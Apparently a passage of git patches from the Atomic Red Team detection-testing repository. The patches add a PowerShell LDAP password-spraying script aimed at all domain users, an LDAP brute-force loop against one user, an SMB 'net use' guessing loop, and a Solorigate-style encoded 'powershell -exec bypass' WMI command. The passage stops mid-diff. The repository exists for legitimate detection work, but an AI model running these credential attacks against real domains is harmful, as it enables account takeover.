credential-access,T1110.001,Password Guessing,1,Brute Force Credentials,09480053-2f98-4854-be6e-71ae5f672224,command_prompt credential-access,T1110.003,Password Spraying,1,Password Spray all Domain Users,90bc2e54-6c84-47a5-9439-0a2a92b4b175,command_prompt credential-access,T1110.003,Password Spraying,2,Password Spray (DomainPasswordSpray),263ae743-515f-4786-ac7d-41ef3a0d4b2b,powershell +credential-access,T1110.003,Password Spraying,3,Password spray all domain users with a single password via LDAP against domain controller (NTLM or Kerberos),f14d956a-5b6e-4a93-847f-0c415142f07d,powershell credential-access,T1552.004,Private Keys,1,Private Keys,520ce462-7ca7-441e-b5a5-f8347f632696,command_prompt credential-access,T1552.004,Private Keys,2,Discover Private SSH Keys,46959285-906d-40fa-9437-5a439accd878,sh credential-access,T1552.004,Private Keys,3,Copy Private SSH Keys with CP,7c247dc7-5128-4643-907b-73a76d9135c3,sh diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv index 582bd47a..cde7430b 100644 --- a/atomics/Indexes/Indexes-CSV/windows-index.csv +++ b/atomics/Indexes/Indexes-CSV/windows-index.csv @@ -38,6 +38,7 @@ credential-access,T1556.002,Password Filter DLL,1,Install and Register Password credential-access,T1110.001,Password Guessing,1,Brute Force Credentials,09480053-2f98-4854-be6e-71ae5f672224,command_prompt credential-access,T1110.003,Password Spraying,1,Password Spray all Domain Users,90bc2e54-6c84-47a5-9439-0a2a92b4b175,command_prompt credential-access,T1110.003,Password Spraying,2,Password Spray (DomainPasswordSpray),263ae743-515f-4786-ac7d-41ef3a0d4b2b,powershell +credential-access,T1110.003,Password Spraying,3,Password spray all domain users with a single password via LDAP against domain controller (NTLM or Kerberos),f14d956a-5b6e-4a93-847f-0c415142f07d,powershell credential-access,T1552.004,Private Keys,1,Private Keys,520ce462-7ca7-441e-b5a5-f8347f632696,command_prompt credential-access,T1003.002,Security Account Manager,1,"Registry dump of SAM, creds, and secrets",5c2571d0-1572-416d-9676-812e64ca9f44,command_prompt credential-access,T1003.002,Security Account Manager,2,Registry parse with pypykatz,a96872b2-cbf3-46cf-8eb4-27e8c0e85263,command_prompt diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md index 6088e791..a1a64307 100644 --- a/atomics/Indexes/Indexes-Markdown/index.md +++ b/atomics/Indexes/Indexes-Markdown/index.md @@ -464,6 +464,7 @@ - [T1110.003 Password Spraying](../../T1110.003/T1110.003.md) - Atomic Test #1: Password Spray all Domain Users [windows] - Atomic Test #2: Password Spray (DomainPasswordSpray) [windows] + - Atomic Test #3: Password spray all domain users with a single password via LDAP against domain controller (NTLM or Kerberos) [windows] - T1556.003 Pluggable Authentication Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1552.004 Private Keys](../../T1552.004/T1552.004.md) - Atomic Test #1: Private Keys [windows] diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md index 50254e24..1e5fa933 100644 --- a/atomics/Indexes/Indexes-Markdown/windows-index.md +++ b/atomics/Indexes/Indexes-Markdown/windows-index.md @@ -71,6 +71,7 @@ - [T1110.003 Password Spraying](../../T1110.003/T1110.003.md) - Atomic Test #1: Password Spray all Domain Users [windows] - Atomic Test #2: Password Spray (DomainPasswordSpray) [windows] + - Atomic Test #3: Password spray all domain users with a single password via LDAP against domain controller (NTLM or Kerberos) [windows] - [T1552.004 Private Keys](../../T1552.004/T1552.004.md) - Atomic Test #1: Private Keys [windows] - [T1003.002 Security Account Manager](../../T1003.002/T1003.002.md) diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index f16741cb..b06f25ba 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -21757,6 +21757,59 @@ credential-access: Invoke-DomainPasswordSpray -Password Spring2017 -Domain #{domain} -Force ' + - name: Password spray all domain users with a single password via LDAP against + domain controller (NTLM or Kerberos) + auto_generated_guid: f14d956a-5b6e-4a93-847f-0c415142f07d + description: | + Attempt to brute force all domain user with a single password (called "password spraying") on a domain controller, via LDAP, with NTLM or Kerberos + + Prerequisite: AD RSAT PowerShell module is needed and it must run under a domain user (to fetch the list of all domain users) + supported_platforms: + - windows + input_arguments: + password: + description: single password we will attempt to auth with (if you need several + passwords, then it is a bruteforce so see T1110.001) + type: String + default: P@ssw0rd! + domain: + description: Domain FQDN + type: String + default: contoso.com + auth: + description: authentication method to choose between "NTLM" and "Kerberos" + type: string + default: NTLM + executor: + name: powershell + elevation_required: false + command: | + if ("#{auth}".ToLower() -NotIn @("ntlm","kerberos")) { + Write-Host "Only 'NTLM' and 'Kerberos' auth methods are supported" + exit 1 + } + + $DomainUsers = Get-ADUser -LDAPFilter '(&(sAMAccountType=805306368)(!(UserAccountControl:1.2.840.113556.1.4.803:=2)))' -Server #{domain} | Select-Object -ExpandProperty SamAccountName + + [System.Reflection.Assembly]::LoadWithPartialName("System.DirectoryServices.Protocols") | Out-Null + $di = new-object System.DirectoryServices.Protocols.LdapDirectoryIdentifier("#{domain}",389) + + $DomainUsers | Foreach-Object { + $user = $_ + $password = "#{password}" + + $credz = new-object System.Net.NetworkCredential($user, $password, "#{domain}") + $conn = new-object System.DirectoryServices.Protocols.LdapConnection($di, $credz, [System.DirectoryServices.Protocols.AuthType]::#{auth}) + try { + Write-Host " [-] Attempting ${password} on account ${user}." + $conn.bind() + # if credentials aren't correct, it will break just above and goes into catch block, so if we're here we can display success + Write-Host " [!] ${user}:${password} are valid credentials!" + } catch { + Write-Host $_.Exception.Message + } + } + Write-Host "End of password spraying" T1556.003: technique: external_references: diff --git a/atomics/T1110.003/T1110.003.md b/atomics/T1110.003/T1110.003.md index e5eae09d..16e10de9 100644 --- a/atomics/T1110.003/T1110.003.md +++ b/atomics/T1110.003/T1110.003.md @@ -27,6 +27,8 @@ In default environments, LDAP and Kerberos connection attempts are less likely t - [Atomic Test #2 - Password Spray (DomainPasswordSpray)](#atomic-test-2---password-spray-domainpasswordspray) +- [Atomic Test #3 - Password spray all domain users with a single password via LDAP against domain controller (NTLM or Kerberos)](#atomic-test-3---password-spray-all-domain-users-with-a-single-password-via-ldap-against-domain-controller-ntlm-or-kerberos) +
@@ -102,4 +104,62 @@ IEX (IWR 'https://raw.githubusercontent.com/dafthack/DomainPasswordSpray/94cb725 +
+
+ +## Atomic Test #3 - Password spray all domain users with a single password via LDAP against domain controller (NTLM or Kerberos) +Attempt to brute force all domain user with a single password (called "password spraying") on a domain controller, via LDAP, with NTLM or Kerberos + +Prerequisite: AD RSAT PowerShell module is needed and it must run under a domain user (to fetch the list of all domain users) + +**Supported Platforms:** Windows + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| password | single password we will attempt to auth with (if you need several passwords, then it is a bruteforce so see T1110.001) | String | P@ssw0rd!| +| domain | Domain FQDN | String | contoso.com| +| auth | authentication method to choose between "NTLM" and "Kerberos" | string | NTLM| + + +#### Attack Commands: Run with `powershell`! + + +```powershell +if ("#{auth}".ToLower() -NotIn @("ntlm","kerberos")) { + Write-Host "Only 'NTLM' and 'Kerberos' auth methods are supported" + exit 1 +} + +$DomainUsers = Get-ADUser -LDAPFilter '(&(sAMAccountType=805306368)(!(UserAccountControl:1.2.840.113556.1.4.803:=2)))' -Server #{domain} | Select-Object -ExpandProperty SamAccountName + +[System.Reflection.Assembly]::LoadWithPartialName("System.DirectoryServices.Protocols") | Out-Null +$di = new-object System.DirectoryServices.Protocols.LdapDirectoryIdentifier("#{domain}",389) + +$DomainUsers | Foreach-Object { + $user = $_ + $password = "#{password}" + + $credz = new-object System.Net.NetworkCredential($user, $password, "#{domain}") + $conn = new-object System.DirectoryServices.Protocols.LdapConnection($di, $credz, [System.DirectoryServices.Protocols.AuthType]::#{auth}) + try { + Write-Host " [-] Attempting ${password} on account ${user}." + $conn.bind() + # if credentials aren't correct, it will break just above and goes into catch block, so if we're here we can display success + Write-Host " [!] ${user}:${password} are valid credentials!" + } catch { + Write-Host $_.Exception.Message + } +} +Write-Host "End of password spraying" +``` + + + + + +
From 7c1471c4030d83d58c4f62d985891e824c3c43a1 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Cl=C3=A9ment=20Notin?= Date: Wed, 6 Jan 2021 20:38:52 +0100 Subject: [PATCH 052/131] T1110.001: add test "Brute Force Credentials of single domain user via LDAP against domain controller (NTLM or Kerberos)" (#1354) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Co-authored-by: Zakaria Addi Co-authored-by: Clément Notin Co-authored-by: Zakaria Addi --- atomics/T1110.001/T1110.001.yaml | 51 +++++++++++++++++++++++++++++++- 1 file changed, 50 insertions(+), 1 deletion(-) diff --git a/atomics/T1110.001/T1110.001.yaml b/atomics/T1110.001/T1110.001.yaml index d3197cb3..9cec219a 100644 --- a/atomics/T1110.001/T1110.001.yaml +++ b/atomics/T1110.001/T1110.001.yaml @@ -1,7 +1,7 @@ attack_technique: T1110.001 display_name: 'Brute Force: Password Guessing' atomic_tests: -- name: Brute Force Credentials +- name: Brute Force Credentials of all domain users via SMB auto_generated_guid: 09480053-2f98-4854-be6e-71ae5f672224 description: | Creates username and password files then attempts to brute force on remote host @@ -32,3 +32,52 @@ atomic_tests: echo "1q2w3e4r" >> #{input_file_passwords} echo "Password!" >> #{input_file_passwords} @FOR /F %n in (#{input_file_users}) DO @FOR /F %p in (#{input_file_passwords}) DO @net use #{remote_host} /user:#{domain}\%n %p 1>NUL 2>&1 && @echo [*] %n:%p && @net use /delete #{remote_host} > NUL +- name: Brute Force Credentials of single domain user via LDAP against domain controller (NTLM or Kerberos) + auto_generated_guid: c2969434-672b-4ec8-8df0-bbb91f40e250 + description: | + Attempt to brute force domain user on a domain controller, via LDAP, with NTLM or Kerberos + supported_platforms: + - windows + input_arguments: + user: + description: Account to bruteforce + type: String + default: bruce.wayne + passwords: + description: List of passwords we will attempt to brute force with + type: String + default: Password1`n1q2w3e4r`nPassword! + domain: + description: Domain FQDN + type: String + default: contoso.com + auth: + description: authentication method to choose between "NTLM" and "Kerberos" + type: string + default: NTLM + executor: + name: powershell + elevation_required: false + command: | + if ("#{auth}".ToLower() -NotIn @("ntlm","kerberos")) { + Write-Host "Only 'NTLM' and 'Kerberos' auth methods are supported" + exit 1 + } + + [System.Reflection.Assembly]::LoadWithPartialName("System.DirectoryServices.Protocols") | Out-Null + $di = new-object System.DirectoryServices.Protocols.LdapDirectoryIdentifier("#{domain}",389) + + $passwords = "#{passwords}".split("{`n}") + foreach ($password in $passwords){ + $credz = new-object System.Net.NetworkCredential("#{user}", $password, "#{domain}") + $conn = new-object System.DirectoryServices.Protocols.LdapConnection($di, $credz, [System.DirectoryServices.Protocols.AuthType]::#{auth}) + try { + Write-Host " [-] Attempting ${password} on account #{user}." + $conn.bind() + # if credentials aren't correct, it will break just above and goes into catch block, so if we're here we can display success + Write-Host " [!] #{user}:${password} are valid credentials!" + } catch { + Write-Host $_.Exception.Message + } + } + Write-Host "End of bruteforce" From a3ad539a58d0523be5e22f76c877c840d730b85f Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team GUID generator Date: Wed, 6 Jan 2021 19:39:08 +0000 Subject: [PATCH 053/131] Generate GUIDs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/used_guids.txt | 1 + 1 file changed, 1 insertion(+) diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt index 2214471a..7ad0fdd2 100644 --- a/atomics/used_guids.txt +++ b/atomics/used_guids.txt @@ -647,3 +647,4 @@ a524ce99-86de-4db6-b4f9-e08f35a47a15 3203ad24-168e-4bec-be36-f79b13ef8a83 129efd28-8497-4c87-a1b0-73b9a870ca3e f14d956a-5b6e-4a93-847f-0c415142f07d +c2969434-672b-4ec8-8df0-bbb91f40e250 From fb179a30a8293875ab6ff4fffcc3be298381b6be Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Wed, 6 Jan 2021 19:39:15 +0000 Subject: [PATCH 054/131] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/Indexes/Indexes-CSV/index.csv | 3 +- atomics/Indexes/Indexes-CSV/windows-index.csv | 3 +- atomics/Indexes/Indexes-Markdown/index.md | 3 +- .../Indexes/Indexes-Markdown/windows-index.md | 3 +- atomics/Indexes/index.yaml | 54 ++++++++++++++++- atomics/T1110.001/T1110.001.md | 59 ++++++++++++++++++- 6 files changed, 118 insertions(+), 7 deletions(-) diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv index 5601a19a..734f83b2 100644 --- a/atomics/Indexes/Indexes-CSV/index.csv +++ b/atomics/Indexes/Indexes-CSV/index.csv @@ -229,7 +229,8 @@ credential-access,T1003,OS Credential Dumping,2,Gsecdump,96345bfc-8ae7-4b6a-80b7 credential-access,T1003,OS Credential Dumping,3,Credential Dumping with NPPSpy,9e2173c0-ba26-4cdf-b0ed-8c54b27e3ad6,powershell credential-access,T1110.002,Password Cracking,1,Password Cracking with Hashcat,6d27df5d-69d4-4c91-bc33-5983ffe91692,command_prompt credential-access,T1556.002,Password Filter DLL,1,Install and Register Password Filter DLL,a7961770-beb5-4134-9674-83d7e1fa865c,powershell -credential-access,T1110.001,Password Guessing,1,Brute Force Credentials,09480053-2f98-4854-be6e-71ae5f672224,command_prompt +credential-access,T1110.001,Password Guessing,1,Brute Force Credentials of all domain users via SMB,09480053-2f98-4854-be6e-71ae5f672224,command_prompt +credential-access,T1110.001,Password Guessing,2,Brute Force Credentials of single domain user via LDAP against domain controller (NTLM or Kerberos),c2969434-672b-4ec8-8df0-bbb91f40e250,powershell credential-access,T1110.003,Password Spraying,1,Password Spray all Domain Users,90bc2e54-6c84-47a5-9439-0a2a92b4b175,command_prompt credential-access,T1110.003,Password Spraying,2,Password Spray (DomainPasswordSpray),263ae743-515f-4786-ac7d-41ef3a0d4b2b,powershell credential-access,T1110.003,Password Spraying,3,Password spray all domain users with a single password via LDAP against domain controller (NTLM or Kerberos),f14d956a-5b6e-4a93-847f-0c415142f07d,powershell diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv index cde7430b..c8f13317 100644 --- a/atomics/Indexes/Indexes-CSV/windows-index.csv +++ b/atomics/Indexes/Indexes-CSV/windows-index.csv @@ -35,7 +35,8 @@ credential-access,T1003,OS Credential Dumping,2,Gsecdump,96345bfc-8ae7-4b6a-80b7 credential-access,T1003,OS Credential Dumping,3,Credential Dumping with NPPSpy,9e2173c0-ba26-4cdf-b0ed-8c54b27e3ad6,powershell credential-access,T1110.002,Password Cracking,1,Password Cracking with Hashcat,6d27df5d-69d4-4c91-bc33-5983ffe91692,command_prompt credential-access,T1556.002,Password Filter DLL,1,Install and Register Password Filter DLL,a7961770-beb5-4134-9674-83d7e1fa865c,powershell -credential-access,T1110.001,Password Guessing,1,Brute Force Credentials,09480053-2f98-4854-be6e-71ae5f672224,command_prompt +credential-access,T1110.001,Password Guessing,1,Brute Force Credentials of all domain users via SMB,09480053-2f98-4854-be6e-71ae5f672224,command_prompt +credential-access,T1110.001,Password Guessing,2,Brute Force Credentials of single domain user via LDAP against domain controller (NTLM or Kerberos),c2969434-672b-4ec8-8df0-bbb91f40e250,powershell credential-access,T1110.003,Password Spraying,1,Password Spray all Domain Users,90bc2e54-6c84-47a5-9439-0a2a92b4b175,command_prompt credential-access,T1110.003,Password Spraying,2,Password Spray (DomainPasswordSpray),263ae743-515f-4786-ac7d-41ef3a0d4b2b,powershell credential-access,T1110.003,Password Spraying,3,Password spray all domain users with a single password via LDAP against domain controller (NTLM or Kerberos),f14d956a-5b6e-4a93-847f-0c415142f07d,powershell diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md index a1a64307..a595ee04 100644 --- a/atomics/Indexes/Indexes-Markdown/index.md +++ b/atomics/Indexes/Indexes-Markdown/index.md @@ -460,7 +460,8 @@ - [T1556.002 Password Filter DLL](../../T1556.002/T1556.002.md) - Atomic Test #1: Install and Register Password Filter DLL [windows] - [T1110.001 Password Guessing](../../T1110.001/T1110.001.md) - - Atomic Test #1: Brute Force Credentials [windows] + - Atomic Test #1: Brute Force Credentials of all domain users via SMB [windows] + - Atomic Test #2: Brute Force Credentials of single domain user via LDAP against domain controller (NTLM or Kerberos) [windows] - [T1110.003 Password Spraying](../../T1110.003/T1110.003.md) - Atomic Test #1: Password Spray all Domain Users [windows] - Atomic Test #2: Password Spray (DomainPasswordSpray) [windows] diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md index 1e5fa933..715edd28 100644 --- a/atomics/Indexes/Indexes-Markdown/windows-index.md +++ b/atomics/Indexes/Indexes-Markdown/windows-index.md @@ -67,7 +67,8 @@ - [T1556.002 Password Filter DLL](../../T1556.002/T1556.002.md) - Atomic Test #1: Install and Register Password Filter DLL [windows] - [T1110.001 Password Guessing](../../T1110.001/T1110.001.md) - - Atomic Test #1: Brute Force Credentials [windows] + - Atomic Test #1: Brute Force Credentials of all domain users via SMB [windows] + - Atomic Test #2: Brute Force Credentials of single domain user via LDAP against domain controller (NTLM or Kerberos) [windows] - [T1110.003 Password Spraying](../../T1110.003/T1110.003.md) - Atomic Test #1: Password Spray all Domain Users [windows] - Atomic Test #2: Password Spray (DomainPasswordSpray) [windows] diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index b06f25ba..b338dc3a 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -21587,7 +21587,7 @@ credential-access: - SaaS identifier: T1110.001 atomic_tests: - - name: Brute Force Credentials + - name: Brute Force Credentials of all domain users via SMB auto_generated_guid: '09480053-2f98-4854-be6e-71ae5f672224' description: 'Creates username and password files then attempts to brute force on remote host @@ -21622,6 +21622,58 @@ credential-access: echo "1q2w3e4r" >> #{input_file_passwords} echo "Password!" >> #{input_file_passwords} @FOR /F %n in (#{input_file_users}) DO @FOR /F %p in (#{input_file_passwords}) DO @net use #{remote_host} /user:#{domain}\%n %p 1>NUL 2>&1 && @echo [*] %n:%p && @net use /delete #{remote_host} > NUL + - name: Brute Force Credentials of single domain user via LDAP against domain + controller (NTLM or Kerberos) + auto_generated_guid: c2969434-672b-4ec8-8df0-bbb91f40e250 + description: 'Attempt to brute force domain user on a domain controller, via + LDAP, with NTLM or Kerberos + +' + supported_platforms: + - windows + input_arguments: + user: + description: Account to bruteforce + type: String + default: bruce.wayne + passwords: + description: List of passwords we will attempt to brute force with + type: String + default: Password1`n1q2w3e4r`nPassword! + domain: + description: Domain FQDN + type: String + default: contoso.com + auth: + description: authentication method to choose between "NTLM" and "Kerberos" + type: string + default: NTLM + executor: + name: powershell + elevation_required: false + command: | + if ("#{auth}".ToLower() -NotIn @("ntlm","kerberos")) { + Write-Host "Only 'NTLM' and 'Kerberos' auth methods are supported" + exit 1 + } + + [System.Reflection.Assembly]::LoadWithPartialName("System.DirectoryServices.Protocols") | Out-Null + $di = new-object System.DirectoryServices.Protocols.LdapDirectoryIdentifier("#{domain}",389) + + $passwords = "#{passwords}".split("{`n}") + foreach ($password in $passwords){ + $credz = new-object System.Net.NetworkCredential("#{user}", $password, "#{domain}") + $conn = new-object System.DirectoryServices.Protocols.LdapConnection($di, $credz, [System.DirectoryServices.Protocols.AuthType]::#{auth}) + try { + Write-Host " [-] Attempting ${password} on account #{user}." + $conn.bind() + # if credentials aren't correct, it will break just above and goes into catch block, so if we're here we can display success + Write-Host " [!] #{user}:${password} are valid credentials!" + } catch { + Write-Host $_.Exception.Message + } + } + Write-Host "End of bruteforce" T1110.003: technique: id: attack-pattern--692074ae-bb62-4a5e-a735-02cb6bde458c diff --git a/atomics/T1110.001/T1110.001.md b/atomics/T1110.001/T1110.001.md index 9d413cf2..c92a2e31 100644 --- a/atomics/T1110.001/T1110.001.md +++ b/atomics/T1110.001/T1110.001.md @@ -25,12 +25,14 @@ In default environments, LDAP and Kerberos connection attempts are less likely t ## Atomic Tests -- [Atomic Test #1 - Brute Force Credentials](#atomic-test-1---brute-force-credentials) +- [Atomic Test #1 - Brute Force Credentials of all domain users via SMB](#atomic-test-1---brute-force-credentials-of-all-domain-users-via-smb) + +- [Atomic Test #2 - Brute Force Credentials of single domain user via LDAP against domain controller (NTLM or Kerberos)](#atomic-test-2---brute-force-credentials-of-single-domain-user-via-ldap-against-domain-controller-ntlm-or-kerberos)
-## Atomic Test #1 - Brute Force Credentials +## Atomic Test #1 - Brute Force Credentials of all domain users via SMB Creates username and password files then attempts to brute force on remote host **Supported Platforms:** Windows @@ -63,4 +65,57 @@ echo "Password!" >> #{input_file_passwords} +
+
+ +## Atomic Test #2 - Brute Force Credentials of single domain user via LDAP against domain controller (NTLM or Kerberos) +Attempt to brute force domain user on a domain controller, via LDAP, with NTLM or Kerberos + +**Supported Platforms:** Windows + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| user | Account to bruteforce | String | bruce.wayne| +| passwords | List of passwords we will attempt to brute force with | String | Password1`n1q2w3e4r`nPassword!| +| domain | Domain FQDN | String | contoso.com| +| auth | authentication method to choose between "NTLM" and "Kerberos" | string | NTLM| + + +#### Attack Commands: Run with `powershell`! + + +```powershell +if ("#{auth}".ToLower() -NotIn @("ntlm","kerberos")) { + Write-Host "Only 'NTLM' and 'Kerberos' auth methods are supported" + exit 1 +} + +[System.Reflection.Assembly]::LoadWithPartialName("System.DirectoryServices.Protocols") | Out-Null +$di = new-object System.DirectoryServices.Protocols.LdapDirectoryIdentifier("#{domain}",389) + +$passwords = "#{passwords}".split("{`n}") +foreach ($password in $passwords){ + $credz = new-object System.Net.NetworkCredential("#{user}", $password, "#{domain}") + $conn = new-object System.DirectoryServices.Protocols.LdapConnection($di, $credz, [System.DirectoryServices.Protocols.AuthType]::#{auth}) + try { + Write-Host " [-] Attempting ${password} on account #{user}." + $conn.bind() + # if credentials aren't correct, it will break just above and goes into catch block, so if we're here we can display success + Write-Host " [!] #{user}:${password} are valid credentials!" + } catch { + Write-Host $_.Exception.Message + } +} +Write-Host "End of bruteforce" +``` + + + + + +
From 6f40ae85f5cbbcebe232991a40c8624eae71205a Mon Sep 17 00:00:00 2001 From: Carrie Roberts Date: Thu, 7 Jan 2021 09:42:43 -0700 Subject: [PATCH 055/131] solarigate atomic (#1358) --- atomics/T1047/T1047.yaml | 16 +++++++++++++++- 1 file changed, 15 insertions(+), 1 deletion(-) diff --git a/atomics/T1047/T1047.yaml b/atomics/T1047/T1047.yaml index 735aea3b..a4456299 100644 --- a/atomics/T1047/T1047.yaml +++ b/atomics/T1047/T1047.yaml @@ -106,4 +106,18 @@ atomic_tests: cleanup_command: | wmic /user:#{user_name} /password:#{password} /node:"#{node}" process where name='#{process_to_execute}' delete >nul 2>&1 name: command_prompt - +- name: Create a Process using WMI Query and an Encoded Command + description: | + Solarigate persistence is achieved via backdoors deployed via various techniques including using PowerShell with an EncodedCommand + Powershell -nop -exec bypass -EncodedCommand + Where the –EncodedCommand, once decoded, would resemble: + Invoke-WMIMethod win32_process -name create -argumentlist ‘rundll32 c:\windows\idmu\common\ypprop.dll _XInitImageFuncPtrs’ -ComputerName WORKSTATION + The EncodedCommand in this atomic is the following: Invoke-WmiMethod -Path win32_process -Name create -ArgumentList notepad.exe + You should expect to see notepad.exe running after execution of this test. + [Solarigate Analysis from Microsoft](https://www.microsoft.com/security/blog/2020/12/18/analyzing-solorigate-the-compromised-dll-file-that-started-a-sophisticated-cyberattack-and-how-microsoft-defender-helps-protect/) + supported_platforms: + - windows + executor: + command: | + powershell -exec bypass -e SQBuAHYAbwBrAGUALQBXAG0AaQBNAGUAdABoAG8AZAAgAC0AUABhAHQAaAAgAHcAaQBuADMAMgBfAHAAcgBvAGMAZQBzAHMAIAAtAE4AYQBtAGUAIABjAHIAZQBhAHQAZQAgAC0AQQByAGcAdQBtAGUAbgB0AEwAaQBzAHQAIABuAG8AdABlAHAAYQBkAC4AZQB4AGUA + name: command_prompt From ed7d3faabda7b4e082b958f9e0dd5a9787d9f5bb Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team GUID generator Date: Thu, 7 Jan 2021 16:43:06 +0000 Subject: [PATCH 056/131] Generate GUIDs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/T1047/T1047.yaml | 1 + atomics/used_guids.txt | 1 + 2 files changed, 2 insertions(+) diff --git a/atomics/T1047/T1047.yaml b/atomics/T1047/T1047.yaml index a4456299..ba0b9e2c 100644 --- a/atomics/T1047/T1047.yaml +++ b/atomics/T1047/T1047.yaml @@ -107,6 +107,7 @@ atomic_tests: wmic /user:#{user_name} /password:#{password} /node:"#{node}" process where name='#{process_to_execute}' delete >nul 2>&1 name: command_prompt - name: Create a Process using WMI Query and an Encoded Command + auto_generated_guid: 7db7a7f9-9531-4840-9b30-46220135441c description: | Solarigate persistence is achieved via backdoors deployed via various techniques including using PowerShell with an EncodedCommand Powershell -nop -exec bypass -EncodedCommand diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt index 7ad0fdd2..f36777d6 100644 --- a/atomics/used_guids.txt +++ b/atomics/used_guids.txt @@ -648,3 +648,4 @@ a524ce99-86de-4db6-b4f9-e08f35a47a15 129efd28-8497-4c87-a1b0-73b9a870ca3e f14d956a-5b6e-4a93-847f-0c415142f07d c2969434-672b-4ec8-8df0-bbb91f40e250 +7db7a7f9-9531-4840-9b30-46220135441c From 5cc2b5a88dbd8ddb47609f4acbb8ebdbfc15be4d Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Thu, 7 Jan 2021 16:43:14 +0000 Subject: [PATCH 057/131] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/Indexes/Indexes-CSV/index.csv | 1 + atomics/Indexes/Indexes-CSV/windows-index.csv | 1 + atomics/Indexes/Indexes-Markdown/index.md | 1 + .../Indexes/Indexes-Markdown/windows-index.md | 1 + atomics/Indexes/index.yaml | 17 ++++++++++ atomics/T1047/T1047.md | 32 +++++++++++++++++++ 6 files changed, 53 insertions(+) diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv index 734f83b2..41599715 100644 --- a/atomics/Indexes/Indexes-CSV/index.csv +++ b/atomics/Indexes/Indexes-CSV/index.csv @@ -729,6 +729,7 @@ execution,T1047,Windows Management Instrumentation,3,WMI Reconnaissance Software execution,T1047,Windows Management Instrumentation,4,WMI Reconnaissance List Remote Services,0fd48ef7-d890-4e93-a533-f7dedd5191d3,command_prompt execution,T1047,Windows Management Instrumentation,5,WMI Execute Local Process,b3bdfc91-b33e-4c6d-a5c8-d64bee0276b3,command_prompt execution,T1047,Windows Management Instrumentation,6,WMI Execute Remote Process,9c8ef159-c666-472f-9874-90c8d60d136b,command_prompt +execution,T1047,Windows Management Instrumentation,7,Create a Process using WMI Query and an Encoded Command,7db7a7f9-9531-4840-9b30-46220135441c,command_prompt lateral-movement,T1021.003,Distributed Component Object Model,1,PowerShell Lateral Movement using MMC20,6dc74eb1-c9d6-4c53-b3b5-6f50ae339673,powershell lateral-movement,T1550.002,Pass the Hash,1,Mimikatz Pass the Hash,ec23cef9-27d9-46e4-a68d-6f75f7b86908,command_prompt lateral-movement,T1550.002,Pass the Hash,2,crackmapexec Pass the Hash,eb05b028-16c8-4ad8-adea-6f5b219da9a9,command_prompt diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv index c8f13317..0027bea2 100644 --- a/atomics/Indexes/Indexes-CSV/windows-index.csv +++ b/atomics/Indexes/Indexes-CSV/windows-index.csv @@ -546,6 +546,7 @@ execution,T1047,Windows Management Instrumentation,3,WMI Reconnaissance Software execution,T1047,Windows Management Instrumentation,4,WMI Reconnaissance List Remote Services,0fd48ef7-d890-4e93-a533-f7dedd5191d3,command_prompt execution,T1047,Windows Management Instrumentation,5,WMI Execute Local Process,b3bdfc91-b33e-4c6d-a5c8-d64bee0276b3,command_prompt execution,T1047,Windows Management Instrumentation,6,WMI Execute Remote Process,9c8ef159-c666-472f-9874-90c8d60d136b,command_prompt +execution,T1047,Windows Management Instrumentation,7,Create a Process using WMI Query and an Encoded Command,7db7a7f9-9531-4840-9b30-46220135441c,command_prompt exfiltration,T1020,Automated Exfiltration,1,IcedID Botnet HTTP PUT,9c780d3d-3a14-4278-8ee5-faaeb2ccfbe0,powershell exfiltration,T1048.003,Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,2,Exfiltration Over Alternative Protocol - ICMP,dd4b4421-2e25-4593-90ae-7021947ad12e,powershell lateral-movement,T1021.003,Distributed Component Object Model,1,PowerShell Lateral Movement using MMC20,6dc74eb1-c9d6-4c53-b3b5-6f50ae339673,powershell diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md index a595ee04..0873dfef 100644 --- a/atomics/Indexes/Indexes-Markdown/index.md +++ b/atomics/Indexes/Indexes-Markdown/index.md @@ -1343,6 +1343,7 @@ - Atomic Test #4: WMI Reconnaissance List Remote Services [windows] - Atomic Test #5: WMI Execute Local Process [windows] - Atomic Test #6: WMI Execute Remote Process [windows] + - Atomic Test #7: Create a Process using WMI Query and an Encoded Command [windows] # lateral-movement - T1550.001 Application Access Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md index 